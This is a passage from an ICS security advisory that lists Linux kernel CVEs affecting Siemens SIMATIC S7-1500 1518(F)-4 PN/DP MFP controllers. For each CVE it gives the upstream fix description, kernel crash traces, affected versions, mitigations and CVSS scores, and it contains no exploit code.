kasan_save_free_info+0x2b/0x50 mm/kasan/generic.c:522 ____kasan_slab_free mm/kasan/common.c:236 [inline] __kasan_slab_free+0x12a/0x1b0 mm/kasan/common.c:244 kasan_slab_free include/linux/kasan.h:164 [in ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-53170">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-54458</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: bsg: Set bsg_queue to NULL after removal Currently, this does not cause any issues, but I believe it is necessary to set bsg_queue to NULL after removing it to prevent potential use-after-free (UAF) access.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-54458">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-56631</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: scsi: sg: Fix slab-use-after-free read in sg_release() Fix a use-after-free bug in sg_release(), detected by syzbot with KASAN: BUG: KASAN: slab-use-after-free in lock_release+0x151/0xa30 kernel/locking/lockdep.c:5838 __mutex_unlock_slowpath+0xe2/0x750 kernel/locking/mutex.c:912 sg_release+0x1f4/0x2e0 drivers/scsi/sg.c:407 In sg_release(), the function kref_put(&amp;sfp-&gt;f_ref, sg_remove_sfp) is called before releasing the open_rel_lock mutex. The kref_put() call may decrement the reference count of sfp to zero, triggering its cleanup through sg_remove_sfp(). This cleanup includes scheduling deferred work via sg_remove_sfp_usercontext(), which ultimately frees sfp. After kref_put(), sg_release() continues to unlock open_rel_lock and may reference sfp or sdp. If sfp has already been freed, this results in a slab-use-after-free error. Move the kref_put(&amp;sfp-&gt;f_ref, sg_remove_sfp) call after unlocking the open_rel_lock mutex. This ensures: - No references to sfp or sdp occur after the reference count is decremented. - Cleanup functions such as sg_remove_sfp() and sg_remove_sfp_usercontext() can safely execute without impacting the mutex handling in sg_release(). The fix has been tested and validated by syzbot. This patch closes the bug reported at the following syzkaller link and ensures proper sequencing of resource cleanup and mutex operations, eliminating the risk of use-after-free errors in sg_release().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-56631">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-56703</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ipv6: Fix soft lockups in fib6_select_path under high next hop churn Soft lockups have been observed on a cluster of Linux-based edge routers located in a highly dynamic environment. Using the `bird` service, these routers continuously update BGP-advertised routes due to frequently changing nexthop destinations, while also managing significant IPv6 traffic. The lockups occur during the traversal of the multipath circular linked-list in the `fib6_select_path` function, particularly while iterating through the siblings in the list. The issue typically arises when the nodes of the linked list are unexpectedly deleted concurrently on a different core—indicated by their 'next' and 'previous' elements pointing back to the node itself and their reference count dropping to zero. This results in an infinite loop, leading to a soft lockup that triggers a system panic via the watchdog timer. Apply RCU primitives in the problematic code sections to resolve the issue. Where necessary, update the references to fib6_siblings to annotate or use the RCU APIs. Include a test script that reproduces the issue. The script periodically updates the routing table while generating a heavy load of outgoing IPv6 traffic through multiple iperf3 clients. It consistently induces infinite soft lockups within a couple of minutes. Kernel log: 0 [ffffbd13003e8d30] machine_kexec at ffffffff8ceaf3eb 1 [ffffbd13003e8d90] __crash_kexec at ffffffff8d0120e3 2 [ffffbd13003e8e58] panic at ffffffff8cef65d4 3 [ffffbd13003e8ed8] watchdog_timer_fn at ffffffff8d05cb03 4 [ffffbd13003e8f08] __hrtimer_run_queues at ffffffff8cfec62f 5 [ffffbd13003e8f70] hrtimer_interrupt at ffffffff8cfed756 6 [ffffbd13003e8fd0] __sysvec_apic_timer_interrupt at ffffffff8cea01af 7 [ffffbd13003e8ff0] sysvec_apic_timer_interrupt at ffffffff8df1b83d -- -- 8 [ffffbd13003d3708] asm_sysvec_apic_timer_interrupt at ffffffff8e000ecb [exception RIP: fib6_select_path+299] RIP: ffffffff8ddafe7b RSP: ffffbd13003d37b8 RFLAGS: 00000287 RAX: ffff975850b43600 RBX: ffff975850b40200 RCX: 0000000000000000 RDX: 000000003fffffff RSI: 0000000051d383e4 RDI: ffff975850b43618 RBP: ffffbd13003d3800 R8: 0000000000000000 R9: ffff975850b40200 R10: 0000000000000000 R11: 0000000000000000 R12: ffffbd13003d3830 R13: ffff975850b436a8 R14: ffff975850b43600 R15: 0000000000000007 ORIG_RAX: ffffffffffffffff CS: 0010 SS: 0018 9 [ffffbd13003d3808] ip6_pol_route at ffffffff8ddb030c 10 [ffffbd13003d3888] ip6_pol_route_input at ffffffff8ddb068c 11 [ffffbd13003d3898] fib6_rule_lookup at ffffffff8ddf02b5 12 [ffffbd13003d3928] ip6_route_input at ffffffff8ddb0f47 13 [ffffbd13003d3a18] ip6_rcv_finish_core.constprop.0 at ffffffff8dd950d0 14 [ffffbd13003d3a30] ip6_list_rcv_finish.constprop.0 at ffffffff8dd96274 15 [ffffbd13003d3a98] ip6_sublist_rcv at ffffffff8dd96474 16 [ffffbd13003d3af8] ipv6_list_rcv at ffffffff8dd96615 17 [ffffbd13003d3b60] __netif_receive_skb_list_core at ffffffff8dc16fec 18 [ffffbd13003d3be0] netif_receive_skb_list_internal at ffffffff8dc176b3 19 [ffffbd13003d3c50] napi_gro_receive at ffffffff8dc565b9 20 [ffffbd13003d3c80] ice_receive_skb at ffffffffc087e4f5 [ice] 21 [ffffbd13003d3c90] ice_clean_rx_irq at ffffffffc0881b80 [ice] 22 [ffffbd13003d3d20] ice_napi_poll at ffffffffc088232f [ice] 23 [ffffbd13003d3d80] __napi_poll at ffffffff8dc18000 24 [ffffbd13003d3db8] net_rx_action at ffffffff8dc18581 25 [ffffbd13003d3e40] __do_softirq at ffffffff8df352e9 26 [ffffbd13003d3eb0] run_ksoftirqd at ffffffff8ceffe47 27 [ffffbd13003d3ec0] smpboot_thread_fn at ffffffff8cf36a30 28 [ffffbd13003d3ee8] kthread at ffffffff8cf2b39f 29 [ffffbd13003d3f28] ret_from_fork at ffffffff8ce5fa64 30 [ffffbd13003d3f50] ret_from_fork_asm at ffffffff8ce03cbb</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-56703">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/835.html">CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-56719</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: stmmac: fix TSO DMA API usage causing oops Commit 66600fac7a98 ("net: stmmac: TSO: Fix unbalanced DMA map/unmap for non-paged SKB data") moved the assignment of tx_skbuff_dma[]'s members to be later in stmmac_tso_xmit(). The buf (dma cookie) and len stored in this structure are passed to dma_unmap_single() by stmmac_tx_clean(). The DMA API requires that the dma cookie passed to dma_unmap_single() is the same as the value returned from dma_map_single(). However, by moving the assignment later, this is not the case when priv-&gt;dma_cap.addr64 &gt; 32 as "des" is offset by proto_hdr_len. This causes problems such as: dwc-eth-dwmac 2490000.ethernet eth0: Tx DMA map failed and with DMA_API_DEBUG enabled: DMA-API: dwc-eth-dwmac 2490000.ethernet: device driver tries to +free DMA memory it has not allocated [device address=0x000000ffffcf65c0] [size=66 bytes] Fix this by maintaining "des" as the original DMA cookie, and use tso_des to pass the offset DMA cookie to stmmac_tso_allocator(). Full details of the crashes can be found at: https://lore.kernel.org/all/d8112193-0386-4e14-b516-37c2d838171a@nvidia.com/ https://lore.kernel.org/all/klkzp5yn5kq5efgtrow6wbvnc46bcqfxs65nz3qy77ujr5turc@bwwhelz2l4dw/</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-56719">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-57917</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: topology: Keep the cpumask unchanged when printing cpumap During fuzz testing, the following warning was discovered: different return values (15 and 11) from vsnprintf("%*pbl ", ...) test:keyward is WARNING in kvasprintf WARNING: CPU: 55 PID: 1168477 at lib/kasprintf.c:30 kvasprintf+0x121/0x130 Call Trace: kvasprintf+0x121/0x130 kasprintf+0xa6/0xe0 bitmap_print_to_buf+0x89/0x100 core_siblings_list_read+0x7e/0xb0 kernfs_file_read_iter+0x15b/0x270 new_sync_read+0x153/0x260 vfs_read+0x215/0x290 ksys_read+0xb9/0x160 do_syscall_64+0x56/0x100 entry_SYSCALL_64_after_hwframe+0x78/0xe2 The call trace shows that kvasprintf() reported this warning during the printing of core_siblings_list. kvasprintf() has several steps: (1) First, calculate the length of the resulting formatted string. (2) Allocate a buffer based on the returned length. (3) Then, perform the actual string formatting. (4) Check whether the lengths of the formatted strings returned in steps (1) and (2) are consistent. If the core_cpumask is modified between steps (1) and (3), the lengths obtained in these two steps may not match. Indeed our test includes cpu hotplugging, which should modify core_cpumask while printing. To fix this issue, cache the cpumask into a temporary variable before calling cpumap_print_{list, cpumask}_to_buf(), to keep it unchanged during the printing process.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-57917">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/362.html">CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H">CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-57924</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: fs: relax assertions on failure to encode file handles Encoding file handles is usually performed by a filesystem &gt;encode_fh() method that may fail for various reasons. The legacy users of exportfs_encode_fh(), namely, nfsd and name_to_handle_at(2) syscall are ready to cope with the possibility of failure to encode a file handle. There are a few other users of exportfs_encode_{fh,fid}() that currently have a WARN_ON() assertion when -&gt;encode_fh() fails. Relax those assertions because they are wrong. The second linked bug report states commit 16aac5ad1fa9 ("ovl: support encoding non-decodable file handles") in v6.6 as the regressing commit, but this is not accurate. The aforementioned commit only increases the chances of the assertion and allows triggering the assertion with the reproducer using overlayfs, inotify and drop_caches. Triggering this assertion was always possible with other filesystems and other reasons of -&gt;encode_fh() failures and more particularly, it was also possible with the exact same reproducer using overlayfs that is mounted with options index=on,nfs_export=on also on kernels &lt; v6.6. Therefore, I am not listing the aforementioned commit as a Fixes commit. Backport hint: this patch will have a trivial conflict applying to v6.6.y, and other trivial conflicts applying to stable kernels &lt; v6.6.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-57924">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/617.html">CWE-617 Reachable Assertion</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-57973</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: rdma/cxgb4: Prevent potential integer overflow on 32bit The "gl-&gt;tot_len" variable is controlled by the user. It comes from process_responses(). On 32bit systems, the "gl-&gt;tot_len + sizeof(struct cpl_pass_accept_req) + sizeof(struct rss_header)" addition could have an integer wrapping bug. Use size_add() to prevent this.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-57973">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-57977</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: memcg: fix soft lockup in the OOM process A soft lockup issue was found in the product with about 56,000 tasks were in the OOM cgroup, it was traversing them when the soft lockup was triggered. watchdog: BUG: soft lockup - CPU#2 stuck for 23s! [VM Thread:1503066] CPU: 2 PID: 1503066 Comm: VM Thread Kdump: loaded Tainted: G Hardware name: Huawei Cloud OpenStack Nova, BIOS RIP: 0010:console_unlock+0x343/0x540 RSP: 0000:ffffb751447db9a0 EFLAGS: 00000247 ORIG_RAX: ffffffffffffff13 RAX: 0000000000000001 RBX: 0000000000000000 RCX: 00000000ffffffff RDX: 0000000000000000 RSI: 0000000000000004 RDI: 0000000000000247 RBP: ffffffffafc71f90 R08: 0000000000000000 R09: 0000000000000040 R10: 0000000000000080 R11: 0000000000000000 R12: ffffffffafc74bd0 R13: ffffffffaf60a220 R14: 0000000000000247 R15: 0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f2fe6ad91f0 CR3: 00000004b2076003 CR4: 0000000000360ee0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: vprintk_emit+0x193/0x280 printk+0x52/0x6e dump_task+0x114/0x130 mem_cgroup_scan_tasks+0x76/0x100 dump_header+0x1fe/0x210 oom_kill_process+0xd1/0x100 out_of_memory+0x125/0x570 mem_cgroup_out_of_memory+0xb5/0xd0 try_charge+0x720/0x770 mem_cgroup_try_charge+0x86/0x180 mem_cgroup_try_charge_delay+0x1c/0x40 do_anonymous_page+0xb5/0x390 